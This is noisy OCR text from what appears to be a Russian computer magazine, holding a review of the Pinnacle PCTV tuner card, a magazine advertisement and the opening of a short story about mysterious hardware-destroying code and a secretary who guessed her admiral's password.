сгорания может убить маму, винт, проц, память и вообще выжечь все потроха. 
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ОСТАНКИНО В КУЗОВЕ | 


test_lab (test_lab@gameland.ru) 


Наверное, ни для кого He 


секрет, что современные 


телепрограммы верста- 


ются при ПОМОЩИ KOM- 


пов. Всякие плашечки 
поверх клипов с названием композы и 
исполнителя, красивые эффекты при 
смене сюжета - все это давно стало goc- 
тупным не только телевизионщикам, но 
и обычным пользователям. Однако если 
раньше, чтобы настроить грамотную ра- 
боту с видео на своем компе, надо было 
некисло заморочиться, то теперь доста- 
точно поставить в кузов Т\/-тюнер, сгру- 
зить с прилагающегося CD пачку сосфта, 
и можешь захватывать, резать, склеи- 
вать, накладывать эсфофекты и тут же за- 
ливать Ha DVD сколько творческой душе 
угодно. Тем более что соответствующие 
девайсы вполне доступны по цене. В 
этом мануале мы решили рассказать те- 
бе о наиболее удачном, по нашему мне- 
нию, решении - Pinacle PCTV от компа- 
нии Pinacle Systems, производителя про- 
фессионального оборудования для не- 
линейного видеомонтажа. 


УСТРОЙСТВО 

Мы протестировали две модели: 
Pinacle PCTV и Pinacle PCTV Pro (вто- 
рая отличается от первой наличием 
ЕМ-тюнера). Девайс представляет со- 
бой компактную PCl-nnaty. На панели 
расположены антенный вход, видеов- 
ход «тюльпан», видеовход S-video, ау- 
диовыход, у модели Pro имеется также 
вход для радиоантенны. Плата поддер- 
живает PAL, SECAM и NTSC системы 
цвета. В комплект входят: красивый 
пульт дистанционного управления, 
датчик дистанционного управления, 
перемычка jack-jack, две батарейки AA, 
схема установки и CD с драйверами, 
софтом и подробным мануалом. Для 
работы устройства минимально требу- 
ется Celeron 600 МГц, 128 Мб RAM. 


УСТАНОВКА 

Плата устанавливается в РС! слот. 
Производители не рекомендуют уста- 
навливать девайс в первый и послед- 
ний слоты, так как они часто не имеют 
уникального прерывания. Аудиовыход 
Pinacle PCTV надо соединить перемыч- 
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кой из комплекта с Line-in звуковой 
карты. Датчик дистанционного управ- 
ления подключается к любому СОМ- 
порту. Далее можно подключить теле- 
визионную антенну, видеомагнитофон 
или камеру. 

После включения компьютера система 
автоматически найдет новое устрой- 
ство. Вставь CD из комплекта, и она aB- 
томатически подцепит их с компакта. 
После перезагрузки запусти авторан 
диска, и на твой компьютер автомати- 
чески установится необходимое ПО. 
После очередного ребута запускается 
тестирование оборудования и совмес- 
тимости драйверов и библиотек DirctX. 
В нашем случае никаких проблем не 
возникло. 


софт 

Весь необходимый сосрт поставляется 
в комплекте. Во-первых, это набор утилит 
для проверки и настройки оборудования: 
PCTV Assistant (производит проверку обо- 
рудования), PCTV Remote (настраивает дис- 
танционное управление), автоматический 
настройщик каналов. 
Во-вторых, это PCTV Vision - программа 
для просмотра ТВ/прослушивания радио 
и захвата видео и звука. При первом за- 
пуске эта сосфтина предложит автомати- 
чески настроить ТВ и радиостанции. 
Программа вполне корректно работает с 
нашим стандартом телевещания и за 5- 
10 минут найдет все каналы и станции. 
При каждом запуске PCTV Vision автома- 
тически производит точную настройку 
каналов, также реализован фильтр шу- 
мов, который несколько улучшает каче- 
ство изображения (настройка -> вкладка 
маео). Программа позволяет захваты- 
вать звук и видео. Большое количество 
настроек позволяют выбрать оптималь- 
ное соотношение битрейт-качество. 
В-третьих, Рпасе PCTV позволяет 
просматривать телетекст. Для этого 
предназначена утилита PCTV 
WebText, которая посредством брау- 
зера выводит информацию, передава- 
емую по телетексту. 
В-четвертых, автоматически устанавли- 
вается Pinacle TReX, который позволяет 
конвертировать аудио и видеосрайлы из 
одного срормата в другой. Программа 


шароварная, и ее необходимо зарегист- 
рировать на сайте Pinacle. 

Также с фирменного CD можно устано- 
вить Pinacle Studio 8.4 и Pinacle 
Hollywood FX. Pinacle Studio 8.4 - это 
программа для нелинейного видеомон- 
тажа. С ее помощью можно захватить 
видео и звук с любого из доступных ис- 
точников, отредактировать фрагменты 
и расположить их в необходимой пос- 
ледовательности, добавить надписи по- 
верх изображения, применить аудио и 
видеоэффекты, добавить меню для 
DVD. Программа позволяет записать 
полученный проект на видеопленку, CD 
и DVD-guck. Pinacle Hollywood FX npeg- 
назначена для создания красивых 3Cp- 
ектов смены сюжета. Например, с ее 
помощью можно сделать так, чтобы од- 
но видеоизображение «разбилось», 
как стекло, и «открыло» другое видеои- 
зображение. Обе программы работают 
в режиме демонстрации и требуют pe- 
гистрации на сайте Pinacle. 


ВЫВОДЫ 

Pinacle PCTV - качественный Т\-тю- 
нер и полноценная плата видеозахвата. 
Устройство легко устанавливается и 
настраивается, а пульт дистанционного 
управления позволяет удобно просмат- 
ривать телепрограммы. Программное 
обеспечение, поставляемое в комплек- 
те, дает возможность монтировать 00- 
вольно сложные видеоклипы с краси- 
выми видеоэсрфектами. 


у По вашим многочисленным 
НОСЫ просьбам издательство 
(дате) 1992 


запускает новое 
ежемесячное издание 
«Путеводитель: Страна Игр», 
полностью посвященное 

‚ прохождениям и кодам 

к самым популярным 
компьютерным играм 


:: 112 страниц исчерпывающей 
информации о лучшиян 
компьютерных проектах! —t 

| №3403) 
:: Самые детальные 
руководства и тактические 
советы, впечатляющие 
подБОрки нинтов и кодов, 
описание скрытын 
возможностей и приемов по 
взлому, рекомендации от 
мастеров киберспорта и 
многое другое! 


:: СО-приложение, под завязку 
наБитое неоБнодимыми 
треинерами, сейвами, модами, 
патчами и прочими полезными 
Бонусами! 
:: Двунсторонний постер и р к. тоны 
формата AZ, который поможет ия ee 
вам в пронождении игр и — E a 
нанождении секретов. 
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Remember when you were young 
You shone like the Sun 
Shine on, you crazy diamond! 
Pink Floyd 
"Wish You Were Here" - "Shine on you crazy diamond" 


TOT день Громов впервые 
в своей достаточно длин- 
ной двадцатипятилетней 
жизни ПОЛУЧИЛ ПО 
МОРДЕ. 

Случилось это самым 
неожиданным образом. 
Борька сидел дома в сво- 
ем любимом кресле за 
своим любимым компью- 
тером и резался в свой 
любимый третий 
"Warcraft". События развивались довольно удачно: армия 
людей, возглавляемая Артесом, выигрывала битву за бит- 
вой, зарабатывая очки и набирая силу, города росли на 
глазах, золото текло рекой. Правда, он чего-то там пере- 
борщил с численностью, вляпался в огромные расходы, но, 
в общем и целом, перевес был на его стороне. 

Звонок в дверь заставил его вздрогнуть. Этот звонок 
был ИЗ ДРУГОГО МИРА, из мира людей, которые не ходят 
боевым порядком, не добывают золото, не пользуются зак- 
линаниями и не рубят нежить пачками. Громкий звук, требо- 
вавший открыть дверь, повторился. Борис с сожалением 
оторвался от игры - ощущение было не из приятных, будто 
окатили холодной водой. Крутанувшись в кресле, он глянул 
в коридор, где еще гудел в воздухе звук дверного звонка: 

- Ну кто там еще? Никого же не жду... 

Встав из-за компьютера, он подошел к двери и в глазок 
увидел на площадке возбужденного Коляна из сороковой 
квартиры. В этот момент где-то внутри кольнула игла сом- 
нения. На дворе зима, холодина, между их подъездами око- 
ло пятидесяти метров, а Колян стоит в одной футболке и 
потирает ладони... Но руки уже сами щелкнули замком и 
стянули цепочку. Дверь приветливо распахнулась. 

Коля действительно был одет далеко не по сезону - в 
глазок еще не были видны шорты по колено и домашние 
тапочки. 

- Ты чего? Лето что ли наступило? - скорчил удивлен- 
ную гримасу Борька, даже забыв предложить гостю войти. 
Колян коротко кивнул и зарядил Громову с правой прямо в 
челюсть. Когда Борька загрохотал костями по коридору, он 
сделал шаг в квартиру. Наклонился над упавшим, который 
в эту секунду, ничего не понимая, держался одной рукой за 
быстро отекающую челюсть, а другой пытался поднять се- 
бя, опираясь на трюмо. 

- Если еще раз, гад... - занес над Громовым кулак Колян. 
- Ecny ТЫ... 

- Ты... Гы чего? - повторил он свой вопрос, но уже вкла- 
дывая в него другой смысл, соответственно ситуации. - Пе- 
реиграл, что ли?.. 

Колян скрипнул зубами: 

- Ты хоть знаешь, гад, сколько ремонт будет стоить? 

- Какой? - Борька немного отполз назад, к стене, что- 
бы между ним и Коляном образовался достаточно безо- 
пасный зазор. - Ты врубаешься, что ты мне по морде 
треснул? 

Говорить было больно. Громов продолжал держаться 
за скулу, понимая, что на пице только что появилось неч- 
то, чего там раньше никогда не было. Шишка, быстро на- 
бухшая и крайне болезненная, изменила его лицо. 

- Это еще мало, сволочь! - зло буркнул Николай, встав 
над Громовым. - Надо было тебе нос сломать! Ты понима- 
ешь, что ты наделал?! 

Николай во дворе и в институте слыл бесшабашным 
парнем. Громов, услышав про сломанный нос, решил, что 
еще не все закончилось, поэтому осторожно спросил: 

- Ты можешь объяснить?.. 

- Нет, это ты мне объяснишь! Базу данных мне написал к 
экзамену? 

Борис кивнул. 

- Перекачал ко мне? 

Громов кивнул снова. 

- Чего ты мне на комп засунул, когда я выходил на кух- 
ню за пивом? 


Борька вытаращил глаза на Николая и даже убрал руку 
от лица: 

- Куда я засунул? Чего ты мелешь? 

Колян с хрустом сжал кулаки. Громов дернулся вбок и 
поспешил сказать: 

- Даты говори, что там случилось, а не кулаками маши! 
Может, еще исправим... 

- Так это ты?! - заорал Колян на всю квартиру. - Лучше 
сознайся, а не то... 

- Дане я, не я! - засучил ногами Борька, не понимая, что 
дальше стенки не уползешь. - Ничего... И не я! 

Николай прищурил глаза, рассматривая жертву, повер- 
женную на пол, словно сквозь прицел: 

- Тогда почему?.. 

- Что? - напрягся Борька. - Что-то с компом? 

И вот тут Колян засомневался, впервые с той секунды, 
как заехал Громову в челюсть. Засомневался, причем нас- 
только явно, что Громов понял - кризис миновал. Почти ми- 
новал. А сейчас начнется конструктивная беседа о том, что 
произошло с машиной Николая после того, как он сходил 
на кухню за пивом. 

Сутки назад Громов закончил писать для Николая базу 
данных - тому предстоял какой-то зачет, преподаватель 
очень любил Паскаль и всех напрягал на тему Delphi. У ca- 
мого Коляна с логикой были проблемы, выстроить что-то 
большее, чем таблица умножения, он не мог, да и не хотел, 
поэтому покупал у Борьки экзаменационные творения за 
хорошие деньги. Сегодня Громов пришел к Николаю домой, 
переписал базу и исходные тексты на компьютер бездарно- 
го третьекурсника, объяснил вкратце, что нужно и что не 


Николай прищурил глаза, 
рассматривая жертву, 
поверженную на пол, словно 
сквозь прицел 


нужно показывать преподавателю, получил свои рубли, 
врезал баночку "Клинского" и отправился домой спать. 

- Вставай, одевайся, - сухо сказал Колян. - И мне дай че- 
го-нибудь накинуть, а то я вылетел в чем был. А там мороз 
под минус двадцать... 

Громов натянул свитер, надел вязаную шапочку, протя- 
нул Коляну меховую куртку, в которую тот завернулся с та- 
ким блаженством, что Борис даже немного пожалел о ней. 
Пробравшись от подъезда к подъезду по свежевычищен- 
ной дорожке, они оказались в квартире у Николая. И уже 
на пороге Громов понял, что что-то не так. 

Отчетливо пахло дымом. Так пахнет проводка, которая 
медленно тлеет в стене от перепадов напряжения. А еще 
пахло сыростью - так, как пахнет обычно на пожаре после 
того, как бушующий огонь зальют сотнями кубических мет- 
ров воды. Правда, интенсивность запаха соответствовала 
пропорциям квартиры Николая - вряд пи здесь в ход пош- 
ло больше пары литров воды из-под крана. 

Хозяин на ходу скинул куртку, она свалилась на пол. 
Громов машинально поднял ее, повесил на вешалку, после 
чего стянул с головы шапочку и сунул в карман. Заходить 
в комнату, а тем более увидеть там что-то, до глубины gy- 
ши потрясшее Николая, не хотелось. 

Его удивленному взору предстал закопченный компью- 
тер Николая - серый, офисного цвета корпус был разукра- 
шен дымными языками в лучших традициях экстремально- 
го модинга. На полу под ним красовалась большая лужа 
воды. Периодически с корпуса срывалась капля и падала в 
нее, разгоняя маленькие волны. В комнате запах гари 
чувствовался острее. 

Колян застыл в нескольких шагах от испорченной ма- 
шины и качал головой, издавая нечленораздельные звуки. 
Борька понял, что пока лучше не приближаться. В мозгу 
вихрем проносились массы самых невероятных причин 
происшедшего, начиная от обычного перепада напряже- 
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ния, заканчивая какими-то жуткими виртуальными карти- 
нами нападения из интернета. 

- Как это случилось? - спросил он у Николая, постепен- 
но забывая о том, что совсем недавно тот был готов избить 
его. - Что ты делал в тот момент, когда... 

- Модем... Какой модем'.. - продолжал причитать Колян, 
не слыша ничего вокруг. 

- Да подожди ты, - не выдержав этих соплей, перебил 
его Громов. - Тащи фен, сейчас разберем, просушим и уз- 
наем, чего у тебя там взорвалось. 

Николай поднял пустой, растерянный взгляд на гостя 
(совсем не такой, как тогда, с занесенным кулаком), потом 
послушно поплелся в недра спальни родителей и вернулся 
с огромным "Брауном" в руках. Откуда-то взялась отверт- 
ка. Ящик был извлечен из-под стола. Громов, не замечая, 
как постепенно весь покрывается копотью, размазывая ее 
TO по рукам, то по лицу, открутил крышку, заглянул внутрь 
и увидел расплавленную видеокарту. 

На плате не просто перегорел мостик, не просто распла- 
вились конденсаторы - она целиком превратилась в потек- 
шую массу, на которой сложно было разобрать, где па- 
мять, где процессор, где радиатор. О том, что это видеокар- 
та, говорил только порт, в который она была вставлена, 
иначе не разобрались бы без бутылки. 

- Так что ты с ней делал? В микроволновку засунул? 

У хозяина хрустнули костяшки пальцев - так резко и 
сильно он сжал кулаки, буквально ввинчиваясь грозным 
взглядом в Борьку. 

- Да ладно, чего ты! - отодвинулся немного в сторону 
Громов и задумался. Потом встал, сбегал домой, принес 


Николай немного успокоился. 
Увидев, что по экрану бегут 
строки тестовых таблиц, он 

расслабился... 


исправную видеокарту, довольно старую, но для проверки 
компьютера подходящую. Включили - работает. 

Николай немного успокоился. Увидев, что по экрану бе- 
гут строки тестовых таблиц, он расслабился, глубоко 
вздохнул и хлопнул Громова по плечу: 

- А жизнь-то налаживается! Хотя на видеокарту я попал... 

Спустя некоторое время из разговора стало ясно, что 
компьютер решил испортиться именно в момент запуска 
той базы данных, которую Громов накануне установил Ни- 
колаю. Щелчок по значку, экран замерцал, погас, а потом 
снизу, из-под стола, потянуло дымком. 

- А если просто совпадение? - пожал плечами Громов. 
Очень уж ему не хотелось выглядеть в глазах соседа ка- 
ким-то вредителем, который уничтожает компьютеры, как 
вирус "Чернобыль", на уровне железа. - Ну, время просто 
пришло... 

- Какое время?! - возмутился Николай. - Какое, Ha сиг... 
Я карту взял три недели назад, чего ты мелешь! 

- Может, дядюшка Ляо на коленке что-то не то спаял... - 
неуверенно защищался Громов, почему-то вдруг поняв, 
что Николай станет требовать деньги на видеокарту имен- 
но с него. То есть гонорар придется вернуть, а может, еще 
и доплатить. 

- Да что ты юлишь, хакер?! - возмутился хозяин погиб- 
шего компа. - Может, мне машину какому-нибудь зубру по- 
казать, чтобы он ее прошерстил вдоль и поперек и нашел 
твои подлянки? 

Борис хотел ответить что-то дерзкое и обидное, но по- 
чему-то смолчал. Он вдруг подумал, что кроме него самого 
никто не сможет лучшим образом изучить компьютер и 
найти причину. 

- Давай, покажи мою базу, - обреченно махнул он рукой, 
как показалось Николаю, сдаваясь и признавая свои злоб- 
ные происки. - Давай-давай, я посмотрю, тебе покажу... Ес- 
ли хочешь, у тебя на глазах все выпотрошу, весь комп. 


- Чего показывать, сам знаешь, где лежит, - буркнул Ни- 
колай. - Смотри, да только ничего больше не делай. 

Громов взял в руки мышку, залез в нужные каталоги, 
открыл исходники. Текста набралось прилично, прокручи- 
вал он его долго, периодически вздыхая, так как ничего не 
мог понять. Ничего предосудительного не попадалось. 

Внезапно его посетила мысль, что строки, которые он 
видит сейчас на экране, выглядят довольно странно. Все, 
вроде бы, в порядке, все на месте. Запустил компилятор - 
ни одной ошибки, так и есть. Да он был в этом уверен - 
прежде чем взять деньги за свою работу, Громов тщатель- 
но изучил внутри базы все, что только можно было. Одна- 
ко отсутствие ошибок еще не говорит о наличии чего-пибо 
деструктивного внутри самого кода. 

Он поднял глаза на Николая. Тому уже порядком все на- 
доело, он отошел в сторону, сел на подоконник и наблюдал 
за происходящим издали. 

Он снова перевел взгляд на экран и поразился тому, что 
увидел - в длинном ряду кода, обрабатывающего запросы к 
базе, в самом его конце были строки, которых не было... Ко- 
торые он не мог написать сам, потому что не понимал их 
смысла. Они не имели к работе базы никакого отношения. 
Громов смотрел на них и удивлялся той логике, которая спо- 
собна была создать подобную конструкцию. Складывалось 
впечатление, что эти строки включены в код с одной лишь 
целью - допустить старт приложения и уничтожить его. 
Правда, мысли об уничтожении посетили Громова только в 
связи с тем, что рядом с ним на столе лежал кусок расплав- 
ленного текстолита. А в принципе, все могло быть иначе. 

Откуда взялись эти хитрые строчки? Николай? Вряд ли, 
он ведь потому и обратился за помощью к Громову, что 
сам не мог правильно расставить и пары операторов без 
ошибок. Ну, не умеет человек мыслить логически'.. Кто-то 
еще? Тут уже посложнее, но тоже вряд ли. Слишком мала 
вероятность, что к Николаю в гости ходят несколько чело- 
век, способных к осмысленному восприятию хоть какого- 
нибудь языка программирования. Скорее, его друзья заме- 
чательно разбираются в современной музыке, ночной жиз- 
ни города, легких наркотиках, но только не в Паскале. 

Тогда откуда? Допустить, что Громов сам их набрал - это 
значит признать за собой провалы в памяти, возможность 
впадать в неконтролируемый транс. Чертовщина какая-то! 

Ответа не находилось. Было ясно, что дело именно в 
этом участке кода - это он сумел расплавить видеокарту, 
тут Борис не сомневался. Вот только что теперь с этим де- 
лать? Громов размышлял недолго. 

- Ты знаешь, Николай, мне надо домой сходить, - сказал 
он хозяину. - Кое-что посмотрю по книжкам, позвоню 
друзьям. Может, у кого были такие случаи. Ты особо не 
беспокойся, сейчас комп работает, карту я тебе пока остав- 
ляю. Голько квартиру проветри, а то как-то неуютно. 

Николай недоверчиво посмотрел на Громова, но уйти 
позволил - повода держать его у себя дома рядом с закоп- 
ченным корпусом явно не было. 

- Только базу больше не запускай, - стоя в дверях, огля- 
нулся Борис. - Будем считать, что вся бяка оттуда пришла. 
И я вот подумал, дома нужен огнетушитель. 

- Да пошел ты! - протянул руку к замку Николай. - Сгла- 
зишь еще... 

Громов кивнул, вышел на площадку и стал медленно 
спускаться. Перед глазами стояли те самые строчки кода, 
которые невесть откуда взялись в его такой стройной и ло- 
гичной базе данных. Выйдя на улицу, он прищурился от яр- 
ких бликов, поднял глаза вверх, к окну Николая. Тот стоял 
и смотрел на улицу, не замечая Громова. Судя по всему, он 
размышлял, садиться ему за компьютер или нет. 

- Лучше не стоит, - ответил за него Громов и направил- 
ся домой. На своем компьютере он раскрыл код - строк не 
было. Излазил все вдоль и поперек - ничего, никаких сле- 
дов. Стало как-то не по себе. Получается, он базу написал, 
Николаю перекачал, и там, откуда ни возьмись, эти самые 
строчки варуг появились. 

По памяти он записал их на бумажке, побоявшись зано- 
сить в компьютер. Глядя на листок из блокнота, лежащий 


перед ним на столе, Громов задумался. Что это было? Код, 
возникший сам собой после переписывания базы на чу- 
жой компьютер. Код, уничтожающий железо. Причем еще 
неизвестно, какова истинная сила деструкции. А если на 
основе этих строк написать вирус? Если этот код запихи- 
вать внутрь каких-нибудь программ и распространять - 
правда, пока непонятно, с какой целью и каким образом... 

На столе перед Громовым лежало ОРУЖИЕ. Четырнад- 
цать строк на листке бумаги. И когда он понял это, то выг- 
реб из стола гонорар, полученный от Николая, отнес ему, 
молча вручил - хозяин сгоревшей машины так же молча 
принял. Потом вошел в комнату, включил компьютер, стер 
те самые строки в конце программы, откомпилировал, за- 
пустил недрогнувшей рукой - все работало исправно. 

Николай, сжимая в руке деньги, понимающе кивнул - дес- 
кать, я в тебе и не сомневался. Попытался сунуть обратно 
несколько купюр - Громов так же молча отказался, отстра- 
нившись. Пожав плечами, хозяин выпустил Бориса из квар- 
тиры, хмыкнул, пересчитал деньги и принялся обзванивать 
компьютерные салоны в поисках новой видеокарты. 

Громов же, вернувшись домой, взял со стола листок, 
опустился в кресло и, поморщившись от боли, тупо пульси- 
рующей в челюсти, задумался... 

В голове вертелись такие названия, как "Аль-Каи- 
да", NASA, ФБР и иже с ними. Он видел себя за клави- 
атурой суперкомпьютера, рассылающего по всему ми- 
ру вирусы, напичканные деструктивным кодом. Маши- 
ны вспыхивали, плавились массивы данных, выходили 
из строя космические корабли и аэродромы, гибли бес- 
ценные агентурные данные и списки клиентов сотовых 
компаний. Борис управлял цивилизацией из сверхсек- 
ретного кабинета в подземном бункере, заставляя пе- 
реводить на свой счет миллиарды долларов и Kapaa 
непокорных своим безжалостным кодом. Власть вскру- 
жила ему голову. Он закрыл глаза и, чувствуя, как 
приятно шуршит в руке бумажка с кодом, продолжал 
грезить о хакерских подвигах. 

Точно так же в детстве он представлял себя крутым ге- 
роем, когда мама отвела его в возрасте восьми лет в сек- 
цию карате и вручила тренеру на воспитание. Этим самым 
"крутым героем" в духе Джеки Чана он был ровно полчаса, 
пока шел к Дворцу спорта, в мечтах разбивая кирпичи и 
спасая одноклассницу Таньку (с которой сидел за одной 
партой) от хулиганов. Уже через пять минут после начала 
тренировки он был жестоко избит каким-то зарвавшимся 
гадом на несколько лет старше, решившим опробовать 
знание новых приемов на новичке. Вернувшись с разби- 
тым носом домой, он затаил злобу на весь мир. Правда, эта 
злоба растаяла в течение следующей недепи, дети обычно 
отходчивы. Но желаний стать кем-то необыкновенным Гро- 
мов больше маме не демонстрировал, боясь ее неуемной 
жажды реализовывать все на практике. 

Когда в дверь позвонили, Борис заканчивал уничтоже- 
ние секретных баз Саддама. Его вирус, внедренный в самое 
сердце охранных систем бывшего президента, выведя из 
строя компьютеры, отвечающие за противовоздушную 
оборону, помогал войскам США навести ракеты на голову 
непокорного Хусейна. Вздрогнув от громкого высокого зву- 
ка, Борис машинально сжал бумажку в кулаке. Потом быст- 
ро осмотрелся, сунул ее в один из журналов, лежащих на 
столе, и только после этого подошел к двери. 

С некоторых пор (а если точнее, с сегодняшнего дня) он 
стал гораздо осторожнее открывать дверь в свою кварти- 
ру. Рука легла Ha ключ, но Громов остановил себя и npeg- 
почел вначале спросить: 

- Кто там? 

Какой-то неотчетливый всхлип, непонятное бульканье. 

- Чего? - не понял Громов, посмотрел в "глазок", никого 
не увидел, но ощутил чье-то присутствие на площадке. По- 
том, присмотревшись внимательнее, он понял, что этот "кто- 
то" стоит, прислонившись к стене рядом с дверью то ли 
лбом, то ли руками. Было видно плечо всхлипывающего и 
булькающего человека, плечо периодически B3gparuBano. 


- Говорить будем, нет? - грубо спросил Громов, npegcta- 
вив себе попрошайку, разыгрывающего жалостливую 
роль на тему "Поможите, сами мы не местные..." 

- Боря... - услышал он знакомый go боли голос. - Борень- 
ка, открой... 

И снова протяжный горестный всхлип. 

- Твою мать... - прошипел Громов, загремел ключами - и 
ему на руки упала Ленка. Она не просто плакала, она рыдба- 
ла так, что плечо Громова, в которое она уткнулась, мгно- 
венно стало мокрым. Борис затащил ее в квартиру - идти са- 
ма она явно не могла, но и не сопротивлялась. Усадив ее в 
прихожей, он снял с нее шапку и варежки, машинально уте- 
рев слезы со щек. Она вдруг вздрогнула и отстранилась. 

Громов присвистнул и сел рядом с ней на пол. Под ле- 
вым глазом у Ленки расплывался огромный синяк разме- 
ром с пятирублевую монету. Отстранилась она от его руки, 
несомненно, из-за боли. 

Возле ее зимних сапог постепенно увеличивалась в 
размерах лужа натаявшего снега. Она спрятала лицо в ла- 
дони, заныла тонко и протяжно - со стороны могло пока- 
заться, что она эту лужу попросту наплакала. Борис хотел 
прикоснуться к ее руке - она не дала, цыкнула на него 
сквозь плач, потом, отвернувшись, начала раздеваться. 
Громов помог, принял из ее рук дубленку, шарф, расстег- 
нул и стащил сапоги (тут она не стала противиться). Провел 
в комнату, осторожно касаясь ее спины ладонью. Помог 
сесть на диван. Она поджала ноги и тут же натянула на них 
плед. Борис почему-то боялся спросить, что произошло. 

Внезапно мелькнула мысль: "Колян!" Громов потрогал 
ноющую скулу, попытался представить себе, как сосед ре- 


- Только базу больше не за- 
пускай, - стоя в дверях, огля- 
нулся Борис. - Будем считать, 
что вся бяка оттуда пришла. 


шает продолжить мщение и подстерегает в полутемном 
подъезде подругу Бориса... Да нет, не может быть! Тот уже 
сегодня кулаки почесал, да и денег получил сполна! 

- Что... случилось? - осторожно спросил он, понимая, 
что в ответ получит самую обыкновенную истерику. - Кто?.. 

Ленка махнула рукой. Она явно порывалась рассказать, 
но дыхание было напрочь сбито плачем, она едва не за- 
дохнулась в попытках произнести хоть слово. Громов сбе- 
гал на кухню, принес стакан минеральной воды. Лена схва- 
тила его, жадно припала к краю и, не замечая, что расплес- 
кивает воду, осушила стакан gO дна. 

Пара шумных вдохов, беззастенчивая отрыжка (Ленку 
аж подбросило на диване). Она махнула рукой еще раз, 
будто извиняясь. 

- Бо-о-рька-а... - заныла она. - Меня уволили... 

- Ни хрена себе, - сказал Громов. - Теперь так увольня- 
ют? Это что, отметка о тридцать третьей статье? 

Он указал на синяк. Лена осторожно прикоснулась к ле- 
вой щеке кончиками пальцев, поморщилась. Потом полез- 
ла в свою сумочку, которую так и не выпустила из рук, вы- 
тащила косметичку. Зеркальце отразило зареванную де- 
вушку с багровеющим кровопоотеком. Лена в сердцах 
швырнула зеркало на пол, но Борис успел подставить но- 
гу, и оно не разбилось. 

- Говори, - коротко приказал Громов. - Что бы там ни бы- 
ло, я этого так не оставлю. 

Опустив глаза в пол, Лена горько вздохнула. Борис при- 
сел рядом, обнял за плечи, погладил: 

- Ты расскажи, а я подумаю, что буду с этим делать. 

Ленка кивнула. 

- Помнишь, Боря, я пару лет назад работала в штабе 
орлота? 

Громов кивнул. 

- Тогда я с отличием окончила курсы, а в штабе требо- 
валась секретарша для командующего, - продолжила Ле- 
на. - Ты это, конечно, знаешь, я тебе рассказывала. Но og- 
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ного ты не знаешь - я тогда не сама ушла, меня выперли 
оттуда в десять минут... 

- Какое это имеет отношение к происходящему? - непо- 
нимающе поднял бровь Громов. 

- A воттакое, - уже окрепшим голосом ответила Лена. - Я 
всегда была хорошей секретаршей, в положительном смысле 
этого слова. Адмирал не мог нарадоваться, всегда все на сво- 
ем месте, все контакты отлажены, все бумажки по полочкам, 
все срайлы в своих директориях. К прессе с заявлением - "Ле- 
ночка, напиши!" К матросским матерям с речью - "Леночка, 
отредактируй!" Короче, без меня шагу не мог ступить... 

Громов чуть не сказал пошлость. Лена это почувство- 
вала, покачала головой: 

- Ему уже сорок шесть лет было, трое детей... Ты на ме- 
ня не дави взглядом, он мне непристойных предложений 
не делал. Короче, все было замечательно. До поры до вре- 
мени. Сам понимаешь, периодически я имела дело с сек- 
ретными документами. Не настолько, правда, секретными, у 
меня уровень допуска был так себе, копеечный. Но на 
компьютер к адмиралу частенько подбрасывали файлы, 
для чтения которых у меня не было прав доступа. Мне они 
были и не нужны, я не утруждала себя похищением тайн у 
государства. Но, черт возьми, когда в течение полугода те- 
бе на экран периодически вылезает окошко типа "Ваших 
прав недостаточно. Введите пароль...", волей-неволей это 
надоедает, как какая-то нехорошая игра. 

Громов подобрался. Рассказ, конечно, никакого отноше- 
ния к синяку на лице пока не имел, но мурашки по спине 
уже почему-то побежали. 


- Гвою мать'.. - прошипел 
Громов, загремел ключами - 
и ему на руки упала Ленка. 


- А тут случился тот самый кошмар на море. Помнишь, 
конец августа двухтысячного, "Курск", все сошли с ума, в 
штабе суматоха, кучи телеграмм, сотни писем по e-mail'y, за- 
шисффрованные протоколы, через мой компьютер перекачи- 
валась такая масса инсформации, что я только и успевала 
фильтровать все по ящикам... Короче, все, чему ты меня в 
свое время научил, пригодилось как никогда. Я была и сек- 
ретарем, и администратором... А секретная информация тог- 
да шла сплошным потоком. К чему ни прикоснешься "мыш- 
кой", даже чтобы просто файл перетащить куда надо, комп 
уже ругается, личная почта адмирала, недостаточно прав!.. 
Ну, я возьми и введи один раз первое, что на ум пришло... 

Борис покачал головой. Продолжение казалось очевидным. 

- И что же ты ввела? - наклонив голову к плечу Лены, 
спросил он. 

- Я несколько раз слышала, как он с женой по телефону 
разговаривал... Представляешь, ее зовут так же, как меня. 
Так он ее "Елочкой" называет... 

- И что там было? - прищурился Борис. - Военная тайна? 

- Ага, - кивнула Лена. - "На лодке живых нет..." И еще 
кое-что по части объяснений случившегося. Мы потом все 
это через пару лет по телевизору услышали, один в один. 
Понимаешь, они сразу знали, что живых нет... И я знала... 
Глаза подняла, а он за спиной стоит... 

- У него на компе, наверное, была какая-нибудь приблу- 
да, оповещающая о доступе к секретному срайлу. А пос- 
кольку он сам его в данный момент не открывал, то первое, 
что пришло в голову - выйти к секретарше и узнать, что 
происходит, - покачал головой Громов. 

- Уж не знаю, что у него и где, но так страшно мне никогда 
не было, - взглянула в глаза Борису Лена. - Он меня за руку 
взял, поднял из-за стола, провел в какой-то кабинет. Там не- 
известный мне полковник с адмиралом двумя сповами пере- 
кинулся, потом бумагу подсунули, я от страха подписала не 
глядя... А адмирал и говорит: "Только пикни, девочка... Зама- 
раю, не отмоешься". Представляешь? А был все время такой 


вежливый, обходительный... Короче, еще через десять ми- 
нут принесли мою трудовую, где уже стояла отметка "Уволе- 
на по собственному желанию". Вот такая история... 

- Я все понимаю, - согласился Борис, - но вот эта штука 
откуда? 

И он в очередной раз указал на синяк на левой щеке. 

- Аявезучая, - с невеселой усмешкой ответила Лена. - 
В смысле прав... 

- Шефр?.. - догадался Громов. 

- Он самый. Почище того адмирала будет. Вот уж не gy- 
мала, что в нашей конторе могут быть проблемы на уровне 
атомных подводных лодок... 

Громов всем своим видом показал, что готов выслу- 
шать продолжение. 

- Понимаешь, - после непродолжительной паузы начала 
Лена, - наверное, шефа привлекло то, где я работала рань- 
ще. Слава Богу, командующий срлотом меня под статью не 
подвел, трудовая книжка чистая, у самого адмирала в рефе- 
рентах ходила... Подкупила я его этим, наверное. Ведь по ра- 
боте я на фирме тоже с секретными документами сталкива- 
лась, только секретность там другого плана - экономическая. 
Правда, и сетку админить мне там не пришлось, был на то 
человек поставлен. Вот он-то и подкузьмил мне, кретин. 

- Как? 

- Знаешь, как говорят? "Если админ в девять утра на ра- 
боте - значит, сервер упал". Так вот, у него частенько быва- 
ло - падения эти самые. Любил он... выпить. Шер его дер- 
жал ввиду исключительности этого человека - знания и уме- 
ния его были на очень высоком уровне, не совсем он еще с 
